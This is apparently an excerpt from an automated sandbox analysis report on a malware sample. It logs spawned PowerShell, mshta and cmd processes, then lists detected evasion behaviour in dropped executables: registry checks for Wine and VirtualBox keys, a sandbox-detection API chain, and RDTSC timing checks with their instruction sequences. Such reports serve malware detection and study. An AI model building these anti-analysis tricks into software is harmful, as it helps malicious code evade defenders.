Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\5c9465cda4.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-94825

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 97320E second address: 973213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 973213 second address: 973232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1144C8B193h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 973232 second address: 973238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 973238 second address: 97323E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 97323E second address: 973242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE046C second address: AE0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE4F50 second address: AE4F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE50A3 second address: AE50A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE9078 second address: AE9099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F114478E736h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F114478E743h 0x00000013 rdtsc
